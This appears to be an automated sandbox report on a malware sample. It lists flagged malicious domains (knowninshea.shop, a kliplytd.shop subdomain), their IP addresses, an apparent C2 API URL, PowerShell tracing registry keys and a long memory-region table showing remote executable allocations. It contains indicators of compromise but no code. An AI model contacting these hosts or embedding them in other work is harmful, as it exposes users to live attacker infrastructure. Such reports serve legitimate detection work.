https://knowninshea.shop:443/api
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 23 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
56wdf7avyu.kliplytd.shop
104.21.96.1
malicious
knowninshea.shop
104.21.42.34
malicious

IPs

IP
Domain
Country
Malicious
104.21.42.34
knowninshea.shop
United States
malicious
104.21.96.1
56wdf7avyu.kliplytd.shop
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 5 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
Download
87E0000
trusted library section
page read and write
malicious
483D000
stack
page read and write
6DCE000
stack
page read and write
8020000
trusted library allocation
page read and write
2C90000
trusted library allocation
page read and write
73D06000
unkown
page readonly
73C0000
trusted library allocation
page read and write
715E000
stack
page read and write
8250000
heap
page read and write
2E2C000
heap
page read and write
2E24000
heap
page read and write
6355000
heap
page read and write
7341000
heap
page read and write
29C0000
heap
page read and write
8210000
trusted library allocation
page execute and read and write
56FD000
heap
page read and write
7570000
trusted library allocation
page read and write
4C6E000
stack
page read and write
7416000
trusted library allocation
page read and write
AE21000
trusted library allocation
page read and write
8500000
trusted library allocation
page read and write
4E44000
heap
page read and write
7381000
heap
page read and write
474E000
stack
page read and write
577C000
heap
page read and write
CE21000
trusted library allocation
page read and write
75FE000
stack
page read and write
6851000
trusted library allocation
page execute
6F85000
heap
page execute and read and write
7420000
trusted library allocation
page read and write
5766000
heap
page read and write
734F000
heap
page read and write
57CD000
heap
page read and write
4790000
heap
page readonly
292D000
stack
page read and write
5066000
trusted library allocation
page read and write
576A000
heap
page read and write
6E8E000
stack
page read and write
6F5B000
stack
page read and write
66BA000
heap
page read and write
7410000
trusted library allocation
page execute and read and write
84BE000
stack
page read and write
7391000
heap
page read and write
4DB5000
trusted library allocation
page read and write
46B0000
trusted library allocation
page read and write
7F638000
trusted library allocation
page execute and read and write
77A0000
trusted library allocation
page read and write
455E000
stack
page read and write
5792000
heap
page read and write
7790000
trusted library allocation
page read and write
84F0000
trusted library allocation
page read and write
47A8000
trusted library allocation
page read and write
6210000
heap
page read and write
4A9D000
stack
page read and write
5789000
heap
page read and write
6173000
heap
page read and write
4A35000
heap
page execute and read and write
575F000
heap
page read and write
73D2000
heap
page read and write
57A0000
heap
page read and write
56F0000
heap
page read and write
720000
heap
page read and write
52B3000
heap
page read and write
2C19000
trusted library allocation
page read and write
82B0000
trusted library allocation
page read and write
70CE000
stack
page read and write
8100000
trusted library allocation
page read and write
57B9000
heap
page read and write
7600000
trusted library allocation
page read and write
2C03000
trusted library allocation
page execute and read and write
D821000
trusted library allocation
page read and write
2C6E000
stack
page read and write
541E000
trusted library allocation
page read and write
2CD0000
heap
page read and write
72BE000
stack
page read and write
4D83000
trusted library allocation
page read and write
4CAD000
stack
page read and write
4D3E000
stack
page read and write
67F0000
trusted library allocation
page read and write
2BC0000
heap
page read and write
576E000
heap
page read and write
7280000
trusted library allocation
page read and write
711E000
stack
page read and write
747E000
stack
page read and write
847E000
stack
page read and write
57BD000
heap
page read and write
8580000
trusted library allocation
page read and write
73D0D000
unkown
page read and write
737B000
heap
page read and write
57B8000
heap
page read and write
5450000
trusted library allocation
page read and write
62A0000
heap
page read and write
7300000
heap
page read and write
73AC000
heap
page read and write
7060000
trusted library allocation
page read and write
2C7D000
heap
page read and write
5790000
heap
page read and write
66B4000
heap
page read and write
8200000
trusted library allocation
page read and write
57A7000
heap
page read and write
A821000
trusted library allocation
page read and write
72A0000
heap
page read and write
2928000
stack
page read and write
9E21000
trusted library allocation
page read and write
2E29000
heap
page read and write
46E5000
trusted library allocation
page execute and read and write
4B40000
heap
page read and write
6E0E000
stack
page read and write
57BE000
heap
page read and write
70A0000
trusted library allocation
page read and write
29DC000
heap
page read and write
6AB9000
heap
page read and write
73B5000
heap
page read and write
46BE000
stack
page read and write
4C60000
heap
page read and write
6A9A000
heap
page read and write
46C0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
5327000
trusted library allocation
page read and write
7A0000
heap
page read and write
2E2D000
heap
page read and write
2D82000
heap
page read and write
4EF0000
trusted library allocation
page read and write
6FCE000
stack
page read and write
5F71000
trusted library allocation
page read and write
6BE3000
trusted library allocation
page read and write
8C10000
heap
page read and write
2C6D000
heap
page read and write
5FB1000
trusted library allocation
page read and write
6EC000
stack
page read and write
8030000
trusted library allocation
page read and write
72B4000
heap
page read and write
2DB8000
heap
page read and write
46C0000
heap
page read and write
54E4000
trusted library allocation
page read and write
714D000
stack
page read and write
6EE0000
heap
page read and write
46BD000
trusted library allocation
page execute and read and write
505C000
trusted library allocation
page read and write
5DE6000
trusted library allocation
page read and write
63A4000
heap
page read and write
2E1D000
heap
page read and write
52B3000
heap
page read and write
73BC000
heap
page read and write
2C0D000
trusted library allocation
page execute and read and write
2C70000
heap
page read and write
67F9000
trusted library allocation
page read and write
5799000
heap
page read and write
8350000
heap
page read and write
2BC8000
heap
page read and write
6A71000
heap
page read and write
67F9000
trusted library allocation
page read and write
4D8E000
stack
page read and write
57AF000
heap
page read and write
2D30000
heap
page read and write
704E000
stack
page read and write
2D7D000
heap
page read and write
575E000
heap
page read and write
7760000
trusted library allocation
page read and write
67FD000
trusted library allocation
page read and write
76D0000
trusted library allocation
page execute and read and write
8344000
heap
page read and write
2BF2000
heap
page read and write
5DB0000
trusted library allocation
page read and write
5790000
heap
page read and write
5700000
heap
page read and write
8194000
trusted library allocation
page read and write
71CE000
stack
page read and write
29D0000
heap
page read and write
4DFA000
trusted library allocation
page read and write
82D6000
heap
page read and write
4BD0000
heap
page read and write
2D7D000
heap
page read and write
7770000
trusted library allocation
page read and write
5D99000
trusted library allocation
page read and write
7420000
trusted library allocation
page read and write
4D90000
trusted library allocation
page read and write
46C7000
heap
page read and write
4630000
trusted library allocation
page execute and read and write
6802000
trusted library allocation
page read and write
4DA0000
trusted library allocation
page read and write
75F0000
trusted library allocation
page read and write
7700000
trusted library allocation
page read and write
6A71000
heap
page read and write
8190000
trusted library allocation
page read and write
5DFB000
trusted library allocation
page read and write
2E18000
heap
page read and write
6EF0000
heap
page read and write
5F6B000
trusted library allocation
page read and write
8000000
heap
page read and write
2E2D000
heap
page read and write
55ED000
stack
page read and write
5790000
heap
page read and write
575F000
heap
page read and write
6E70000
trusted library allocation
page read and write
2C9A000
heap
page read and write
5273000
heap
page read and write
75B0000
trusted library allocation
page read and write
62E2000
heap
page read and write
67F9000
trusted library allocation
page read and write
73CF1000
unkown
page execute read
2C78000
heap
page read and write
6ACE000
heap
page read and write
8540000
trusted library allocation
page read and write
81B0000
trusted library allocation
page read and write
7710000
trusted library allocation
page read and write
763F000
stack
page read and write
677F000
heap
page read and write
81B5000
trusted library allocation
page read and write
6F24000
heap
page read and write
95A000
stack
page read and write
2C0C000
heap
page read and write
690000
remote allocation
page execute and read and write
63E6000
heap
page read and write
6363000
heap
page read and write
8560000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
4ACF000
stack
page read and write
46E0000
trusted library allocation
page read and write
2C2A000
trusted library allocation
page execute and read and write
2C26000
trusted library allocation
page execute and read and write
4E80000
heap
page read and write
5764000
heap
page read and write
6EDD000
stack
page read and write
7080000
trusted library allocation
page execute and read and write
5779000
heap
page read and write
67F9000
trusted library allocation
page read and write
67FE000
trusted library allocation
page read and write
680A000
trusted library allocation
page read and write
7FE4000
stack
page read and write
2A45000
heap
page read and write
52B3000
heap
page read and write
45D0000
trusted library allocation
page read and write
6E78000
heap
page read and write
2E24000
heap
page read and write
2DA5000
heap
page read and write
766B000
stack
page read and write
2C20000
trusted library allocation
page read and write
4CC0000
trusted library allocation
page execute and read and write
81FD000
stack
page read and write
4A16000
heap
page read and write
4D80000
trusted library allocation
page read and write
6E6000
remote allocation
page readonly
6363000
heap
page read and write
7740000
trusted library allocation
page read and write
4A10000
trusted library allocation
page execute and read and write
5223000
heap
page read and write
50AC000
trusted library allocation
page read and write
52D0000
heap
page read and write
2F2E000
stack
page read and write
6260000
heap
page read and write
5445000
trusted library allocation
page read and write
6855000
trusted library allocation
page execute
5234000
heap
page read and write
6800000
trusted library allocation
page read and write
6806000
trusted library allocation
page read and write
4A8E000
stack
page read and write
6E1E000
stack
page read and write
67FA000
trusted library allocation
page read and write
2D8E000
stack
page read and write
505E000
trusted library allocation
page read and write
5780000
heap
page read and write
84F0000
trusted library allocation
page execute and read and write
843E000
stack
page read and write
5221000
heap
page read and write
5702000
heap
page read and write
BBEE000
trusted library allocation
page read and write
4D88000
trusted library allocation
page read and write
45D8000
trusted library allocation
page read and write
9B0000
heap
page read and write
5761000
heap
page read and write
52EA000
heap
page read and write
4DB0000
heap
page execute and read and write
733F000
heap
page read and write
5237000
heap
page read and write
6C23000
trusted library allocation
page read and write
86E0000
trusted library allocation
page read and write
7192000
heap
page read and write
4DE0000
heap
page read and write
89CB000
stack
page read and write
753D000
stack
page read and write
6807000
trusted library allocation
page read and write
461C000
stack
page read and write
B187000
trusted library allocation
page read and write
2E8D000
heap
page read and write
82D0000
heap
page read and write
8220000
heap
page read and write
56FD000
heap
page read and write
4E23000
trusted library allocation
page read and write
B1D5000
trusted library allocation
page read and write
478E000
stack
page read and write
2E29000
heap
page read and write
28EC000
stack
page read and write
7400000
trusted library allocation
page read and write
6AC7000
heap
page read and write
80F0000
trusted library allocation
page execute and read and write
2C9A000
heap
page read and write
5237000
heap
page read and write
73CF0000
unkown
page readonly
7560000
trusted library allocation
page read and write
5D91000
trusted library allocation
page read and write
9FD000
stack
page read and write
4D6E000
stack
page read and write
7453000
heap
page read and write
74FE000
stack
page read and write
5799000
heap
page read and write
76E0000
heap
page read and write
73B0000
trusted library allocation
page read and write
6AB2000
heap
page read and write
583F000
trusted library allocation
page read and write
73F0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
7720000
trusted library allocation
page read and write
2D73000
heap
page read and write
A00000
heap
page read and write
66C1000
heap
page read and write
2E05000
heap
page read and write
6E9D000
stack
page read and write
4F16000
trusted library allocation
page read and write
73B8000
heap
page read and write
2D4E000
stack
page read and write
8A0D000
stack
page read and write
2E28000
heap
page read and write
2C1D000
trusted library allocation
page execute and read and write
4BB0000
heap
page read and write
6F1D000
stack
page read and write
6650000
trusted library allocation
page read and write
5225000
heap
page read and write
4B4E000
stack
page read and write
9821000
trusted library allocation
page read and write
680D000
trusted library allocation
page read and write
5450000
trusted library allocation
page read and write
82F0000
heap
page read and write
2DAE000
stack
page read and write
6D6000
remote allocation
page readonly
2C09000
heap
page read and write
46A0000
trusted library allocation
page read and write
531E000
stack
page read and write
720E000
stack
page read and write
80E0000
heap
page read and write
6BC2000
trusted library allocation
page read and write
57B0000
heap
page read and write
86F0000
trusted library allocation
page read and write
4E40000
heap
page read and write
6C98000
trusted library allocation
page read and write
2E0C000
heap
page read and write
2A40000
heap
page read and write
73F5000
heap
page read and write
46B3000
trusted library allocation
page execute and read and write
2DC4000
heap
page read and write
7430000
heap
page execute and read and write
72CD000
heap
page read and write
6F62000
heap
page read and write
6808000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
6D8000
remote allocation
page execute and read and write
5830000
trusted library allocation
page read and write
4D8A000
trusted library allocation
page read and write
4A14000
heap
page read and write
7303000
heap
page read and write
B0F1000
trusted library allocation
page read and write
545B000
trusted library allocation
page read and write
729000
stack
page read and write
82EA000
heap
page read and write
5225000
heap
page read and write
6EA0000
trusted library allocation
page read and write
2D7F000
heap
page read and write
826000
heap
page read and write
559F000
stack
page read and write
84E0000
trusted library allocation
page read and write
821D000
stack
page read and write
6809000
trusted library allocation
page read and write
8E21000
trusted library allocation
page read and write
830000
trusted library section
page read and write
8337000
heap
page read and write
541F000
stack
page read and write
70B0000
trusted library allocation
page read and write
82A7000
trusted library allocation
page read and write
4D8E000
trusted library allocation
page read and write
8570000
trusted library allocation
page execute and read and write
7540000
trusted library allocation
page read and write
4D80000
heap
page read and write
680F000
trusted library allocation
page read and write
8170000
heap
page read and write
85A000
stack
page read and write
2DD2000
heap
page read and write
2C10000
trusted library allocation
page read and write
76BD000
stack
page read and write
76C0000
trusted library allocation
page read and write
484A000
heap
page read and write
4B8D000
stack
page read and write
4DD5000
trusted library allocation
page read and write
73A7000
heap
page read and write
957000
stack
page read and write
6690000
trusted library allocation
page execute
62E1000
heap
page read and write
4D4C000
stack
page read and write
77B0000
trusted library allocation
page read and write
8580000
trusted library allocation
page read and write
4CF0000
heap
page execute and read and write
A2A000
heap
page read and write
63E7000
heap
page read and write
8552000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
4BA0000
heap
page read and write
67F9000
trusted library allocation
page read and write
2D73000
heap
page read and write
6854000
trusted library allocation
page execute
629E000
heap
page read and write
2D38000
heap
page read and write
66BF000
heap
page read and write
56F5000
heap
page read and write
2DC1000
heap
page read and write
57CD000
heap
page read and write
5225000
heap
page read and write
6852000
trusted library allocation
page execute
2C90000
heap
page read and write
549C000
stack
page read and write
A30000
heap
page read and write
5763000
heap
page read and write
5237000
heap
page read and write
4CA0000
trusted library allocation
page read and write
710D000
stack
page read and write
4650000
heap
page read and write
67FF000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
2DEF000
stack
page read and write
7070000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
84C0000
trusted library allocation
page execute and read and write
734A000
heap
page read and write
56FC000
heap
page read and write
5241000
heap
page read and write
52C3000
heap
page read and write
2D7D000
heap
page read and write
7373000
heap
page read and write
2DA6000
heap
page read and write
6801000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
56FF000
heap
page read and write
8230000
trusted library allocation
page read and write
6261000
heap
page read and write
757E000
stack
page read and write
2BEA000
heap
page read and write
2DBE000
heap
page read and write
29CD000
heap
page read and write
73B0000
trusted library allocation
page read and write
6846000
trusted library allocation
page read and write
72DD000
heap
page read and write
464D000
stack
page read and write
4B90000
trusted library allocation
page execute and read and write
67FC000
trusted library allocation
page read and write
82E0000
heap
page read and write
57A0000
heap
page read and write
6314000
heap
page read and write
4DC1000
trusted library allocation
page read and write
467C000
stack
page read and write
7620000
trusted library allocation
page read and write
544A000
trusted library allocation
page read and write
4B43000
heap
page read and write
5273000
heap
page read and write
2D74000
heap
page read and write
82AB000
trusted library allocation
page read and write
5779000
heap
page read and write
506A000
trusted library allocation
page read and write
2CE0000
heap
page read and write
680E000
trusted library allocation
page read and write
5443000
trusted library allocation
page read and write
2CAA000
heap
page read and write
2D90000
heap
page read and write
5779000
heap
page read and write
5440000
trusted library allocation
page read and write
575F000
heap
page read and write
5E2C000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
530F000
trusted library allocation
page read and write
6896000
heap
page read and write
6AA3000
heap
page read and write
69B1000
trusted library allocation
page read and write
2DF2000
heap
page read and write
7F620000
trusted library allocation
page execute and read and write
4CB0000
trusted library allocation
page read and write
73F2000
heap
page read and write
6E4E000
stack
page read and write
7410000
heap
page execute and read and write
829E000
stack
page read and write
629F000
heap
page read and write
45FE000
stack
page read and write
73E0000
trusted library allocation
page read and write
2C23000
heap
page read and write
57BD000
heap
page read and write
7580000
trusted library allocation
page read and write
7358000
heap
page read and write
809D000
stack
page read and write
2BDC000
heap
page read and write
63E6000
heap
page read and write
29F0000
trusted library allocation
page read and write
4B9F000
stack
page read and write
B1EE000
trusted library allocation
page read and write
7550000
trusted library allocation
page execute and read and write
4840000
heap
page read and write
5DB9000
trusted library allocation
page read and write
8760000
trusted library section
page read and write
4D0E000
stack
page read and write
73E0000
trusted library allocation
page read and write
84D0000
trusted library allocation
page execute and read and write
C0D000
stack
page read and write
A35000
heap
page read and write
6AB2000
heap
page read and write
45C0000
trusted library allocation
page read and write
4A20000
trusted library allocation
page read and write
52B5000
heap
page read and write
6803000
trusted library allocation
page read and write
4700000
trusted library allocation
page read and write
51E0000
heap
page read and write
2DDC000
heap
page read and write
2B8D000
stack
page read and write
8550000
trusted library allocation
page read and write
832F000
heap
page read and write
2E2B000
heap
page read and write
4D7E000
stack
page read and write
4BC0000
heap
page read and write
2A20000
heap
page read and write
7345000
heap
page read and write
5776000
heap
page read and write
46C9000
trusted library allocation
page read and write
5DA0000
trusted library allocation
page read and write
2E10000
heap
page read and write
2ECF000
stack
page read and write
29A0000
heap
page read and write
7090000
trusted library allocation
page read and write
4A30000
heap
page execute and read and write
5837000
trusted library allocation
page read and write
4A10000
heap
page read and write
46E2000
trusted library allocation
page read and write
2CA1000
heap
page read and write
29E0000
trusted library section
page read and write
8500000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
4E06000
trusted library allocation
page read and write
698A000
heap
page read and write
2DA2000
heap
page read and write
73D0D000
unkown
page read and write
62E1000
heap
page read and write
46B4000
trusted library allocation
page read and write
67FB000
trusted library allocation
page read and write
4670000
heap
page read and write
67D0000
trusted library allocation
page read and write
680B000
trusted library allocation
page read and write
691000
remote allocation
page execute read
A26000
heap
page read and write
8C0C000
stack
page read and write
76F0000
trusted library allocation
page read and write
6850000
trusted library allocation
page execute
DE21000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
2C71000
heap
page read and write
8110000
trusted library allocation
page read and write
7287000
trusted library allocation
page read and write
2D70000
heap
page read and write
58D0000
trusted library allocation
page read and write
2C22000
trusted library allocation
page read and write
575E000
heap
page read and write
2D7D000
heap
page read and write
51E1000
heap
page read and write
8B0B000
stack
page read and write
2DBD000
heap
page read and write
52C1000
heap
page read and write
8206000
trusted library allocation
page read and write
6ABF000
heap
page read and write
8520000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
73C3000
heap
page read and write
820000
heap
page read and write
8590000
trusted library allocation
page execute and read and write
4BFE000
stack
page read and write
75C0000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
6853000
trusted library allocation
page execute
2C69000
heap
page read and write
629F000
heap
page read and write
4C3F000
stack
page read and write
708A000
stack
page read and write
5068000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
56FF000
heap
page read and write
2D0E000
stack
page read and write
73D0F000
unkown
page readonly
85A0000
trusted library allocation
page execute and read and write
7F0000
heap
page read and write
6F80000
heap
page execute and read and write
2DBE000
heap
page read and write
8129000
trusted library allocation
page read and write
8190000
trusted library allocation
page execute and read and write
2E33000
heap
page read and write
2C32000
trusted library allocation
page read and write
6E5C000
stack
page read and write
2C35000
trusted library allocation
page execute and read and write
74BE000
stack
page read and write
2990000
heap
page read and write
8240000
trusted library allocation
page execute and read and write
698A000
heap
page read and write
5420000
heap
page read and write
2C9D000
heap
page read and write
6ABF000
heap
page read and write
2DCD000
heap
page read and write
4D91000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
A20000
heap
page read and write
67F1000
trusted library allocation
page read and write
57AF000
heap
page read and write
67F9000
trusted library allocation
page read and write
85B0000
trusted library section
page read and write
8120000
trusted library allocation
page read and write
2C81000
heap
page read and write
29BC000
stack
page read and write
52BB000
heap
page read and write
B1CE000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
4BCF000
stack
page read and write
8010000
trusted library allocation
page execute and read and write
6EE0000
trusted library allocation
page read and write
5DC1000
trusted library allocation
page read and write
67A000
stack
page read and write
459E000
stack
page read and write
B1AC000
trusted library allocation
page read and write
29C0000
heap
page read and write
6A70000
heap
page read and write
2C00000
trusted library allocation
page read and write
6355000
heap
page read and write
4B0E000
stack
page read and write
73F0000
heap
page read and write
2E24000
heap
page read and write
2C60000
heap
page readonly
7EE000
stack
page read and write
700E000
stack
page read and write
47FC000
stack
page read and write
718B000
stack
page read and write
63A4000
heap
page read and write
7373000
heap
page read and write
5A6A000
trusted library allocation
page read and write
63B000
stack
page read and write
629E000
heap
page read and write
4A1F000
heap
page read and write
75BE000
stack
page read and write
2DBB000
heap
page read and write
2C04000
trusted library allocation
page read and write
2E20000
heap
page read and write
72FE000
stack
page read and write
56EE000
stack
page read and write
5487000
trusted library allocation
page read and write
5055000
trusted library allocation
page read and write
767E000
stack
page read and write
81A0000
trusted library allocation
page read and write
680C000
trusted library allocation
page read and write
56FF000
heap
page read and write
84FE000
trusted library allocation
page read and write
2E29000
heap
page read and write
8560000
trusted library allocation
page execute and read and write
6362000
heap
page read and write
8855000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
5779000
heap
page read and write
82A0000
trusted library allocation
page read and write
C5EE000
trusted library allocation
page read and write
5382000
heap
page read and write
6805000
trusted library allocation
page read and write
29B0000
heap
page read and write
6804000
trusted library allocation
page read and write
80DE000
stack
page read and write
2DBB000
heap
page read and write
2CBE000
heap
page read and write
2DF0000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
6355000
heap
page read and write
There are 669 hidden memdumps, click here to show them.